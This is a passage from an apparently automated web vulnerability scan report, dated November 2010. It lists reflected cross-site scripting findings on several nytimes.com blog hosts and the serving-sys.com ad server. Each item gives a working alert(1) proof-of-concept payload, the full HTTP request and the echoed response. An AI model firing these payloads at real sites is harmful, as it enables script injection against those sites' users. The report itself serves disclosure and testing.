<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/the-nutcracker-chroniclesc8d81\"><script>alert(1)</script>c72ce13dac8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/today/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de2b9"><script>alert(1)</script>a5cf14ef85b was submitted in the REST URL parameter 2. This input was echoed as de2b9\"><script>alert(1)</script>a5cf14ef85b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/todayde2b9"><script>alert(1)</script>a5cf14ef85b/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/todayde2b9\"><script>alert(1)</script>a5cf14ef85b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/tony-scott/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 759e8"><script>alert(1)</script>ffce1e028bf was submitted in the REST URL parameter 2. This input was echoed as 759e8\"><script>alert(1)</script>ffce1e028bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/tony-scott759e8"><script>alert(1)</script>ffce1e028bf/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/tony-scott759e8\"><script>alert(1)</script>ffce1e028bf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/unstoppable/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ebc"><script>alert(1)</script>69d455abf66 was submitted in the REST URL parameter 2. This input was echoed as 57ebc\"><script>alert(1)</script>69d455abf66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/unstoppable57ebc"><script>alert(1)</script>69d455abf66/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/unstoppable57ebc\"><script>alert(1)</script>69d455abf66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /tag/week-in-culture-pictures/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46998"><script>alert(1)</script>93dbc148a41 was submitted in the REST URL parameter 2. This input was echoed as 46998\"><script>alert(1)</script>93dbc148a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/week-in-culture-pictures46998"><script>alert(1)</script>93dbc148a41/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/week-in-culture-pictures46998\"><script>alert(1)</script>93dbc148a41&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atwar.blogs.nytimes.com
Path:   /2010/11/12/the-state-of-schools-in-swat/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810f2"><script>alert(1)</script>3ec6b036ff6 was submitted in the src parameter. This input was echoed as 810f2\"><script>alert(1)</script>3ec6b036ff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/the-state-of-schools-in-swat/?src=twr810f2"><script>alert(1)</script>3ec6b036ff6 HTTP/1.1
Host: atwar.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
SIDE&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd;af-pak;education;girls;pakistan;swat&src=twr810f2\"><script>alert(1)</script>3ec6b036ff6">
...[SNIP]...

3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bits.blogs.nytimes.com
Path:   /2010/11/12/facebook-to-start-an-e-mail-service/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 720b9"><script>alert(1)</script>0cd621483e2 was submitted in the src parameter. This input was echoed as 720b9\"><script>alert(1)</script>0cd621483e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/facebook-to-start-an-e-mail-service/?src=twr720b9"><script>alert(1)</script>0cd621483e2 HTTP/1.1
Host: bits.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 01:59:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://bits.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Technology;Start-Ups;Internet;Enterprise;Gadgets;company-news;e-mail;facebook;internet;social-networking&src=twr720b9\"><script>alert(1)</script>0cd621483e2">
...[SNIP]...

3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 550d0%3balert(1)//2f013fc219c was submitted in the h parameter. This input was echoed as 550d0;alert(1)//2f013fc219c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250550d0%3balert(1)//2f013fc219c&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
</IMG>");var ebO = new Object();ebO.w=300;ebO.h=250550d0;alert(1)//2f013fc219c;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452/Type-11/4
...[SNIP]...

3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 416d8%3balert(1)//ad7018bc358 was submitted in the w parameter. This input was echoed as 416d8;alert(1)//ad7018bc358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300416d8%3balert(1)//ad7018bc358&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
</IMG>");var ebO = new Object();ebO.w=300416d8;alert(1)//ad7018bc358;ebO.h=250;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452
...[SNIP]...

3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the z request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de13f%3balert(1)//59f87800f7c was submitted in the z parameter. This input was echoed as de13f;alert(1)//59f87800f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0de13f%3balert(1)//59f87800f7c HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
bO.plt=9;ebO.ut=gEbUT;ebO.oo=0;ebO.op=escape(ebTokens("ebLoadScript(\"ebPlayScript\",\"http://amch.questionmarket.com/adscgen/sta.php?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\")"));ebO.z=0de13f;alert(1)//59f87800f7c;ebO.pv="_3_0_3";ebBv="_4_1_7";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";var ebIfrm=(""=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc+">
...[SNIP]...

3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab0"><a>aee81adada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 72749

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5
...[SNIP]...

3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.nytimes.com
Path:   /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb87'-alert(1)-'a3eb2ede684 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comments9eb87'-alert(1)-'a3eb2ede684/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

